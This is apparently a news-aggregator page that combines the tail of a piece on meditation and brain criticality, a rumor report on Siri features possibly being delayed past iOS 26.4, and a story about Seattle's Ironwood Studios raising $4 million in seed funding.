One of the most striking findings in the analysis of the criticality deviation coefficient showed a clear distinction between Samatha and Vipassana. This indicates that, although both practices increase brain complexity, they do so through different dynamic configurations, consistent with their subjective experiences. In other words, Vipassana brings the practitioner closer to the balance of stability and flexibility, while Samatha produces a somewhat more stable and focused state. According to researchers, the closer the brain gets to this critical state of balance, the more responsively and efficiently it functions. This is reflected, for example, in a greater capacity to switch tasks or to store information.

Source link

Continue Reading

Tech

Siri testing isn't going well, new features probably won't ship in iOS 26.4

Published

on

A report suggests that internal testing hasn’t been going well with the new Siri and some features, including access to personal data, will likely be pushed back to iOS 26.5 and iOS 27.

A blue iPhone 17 Pro standing against the Apple Intelligence logo in the background
iPhone 17 Pro Max is an AI powerhouse waiting on Apple’s updates

The reporting around artificial intelligence and Apple has been a never-ending treasure trove of doomcasting for the company, but vague details of delays regarding unannounced products are nothing new. After Apple reassessed its Apple Intelligence features promised during WWDC 2024, it paused personalized intelligence in the hopes it could be better refined in the following year.
According to the report from Bloomberg, anonymous tipsters that have information related to the development of the upgraded Apple Intelligence suggest some features may be delayed yet again. These include Siri’s ability to access a user’s personal data, but the details on that delay are iffy.
Rumor Score: 🤔 Possible
Continue Reading on AppleInsider | Discuss on our Forums

Source link

Continue Reading

Tech

Seattle gaming startup Ironwood Studios raises $4 million for its next project

Published

on

(Ironwood Studios Image)

The Seattle-area independent production studio behind the hit video game Pacific Drive raised $4 million in seed funding.

The round, led by Lifelike Capital, is aimed toward financing Redmond, Wash.-based Ironwood Studios’ next game.

Pacific Drive, released in Feb. 2024 for PlayStation, Xbox, and PC and published by Kepler Interactive, is a “driving survival” game set in 1998, where players build, fix, and customize an old station wagon in order to survive a science-warped zone in the rural Pacific Northwest.

Notably, PD features no traditional combat; instead, you must outwit and evade environmental dangers while using scrap metal and scavenged parts to keep your car in working order. (You can read GeekWire’s review of Pacific Drive here.)

“As a team we are very thankful for the opportunity to keep making games and at the same time so incredibly excited for what the future of Ironwood holds,” Cassandra Dracott, Ironwood’s CEO and creative director, said in an press release. “This funding round points us towards the best version of that future and we’re thrilled to work alongside Lifelike Capital to make it a reality.”

Advertisement

GeekWire reached out to Ironwood Studios for further comment.

As per an official release from Ironwood, PD has sold over 1.5 million units since its debut, in addition to being released on both the Xbox Game Pass and PlayStation Plus subscription services. Ironwood released a paid expansion for PD, Whispers in the Woods, in October.

In addition, filmmaker James Wan (Saw, The Conjuring) acquired the TV rights for Pacific Drive in 2024, though there has been no further public information about the project.

Source link

Advertisement
Continue Reading

Trending

Copyright © 2025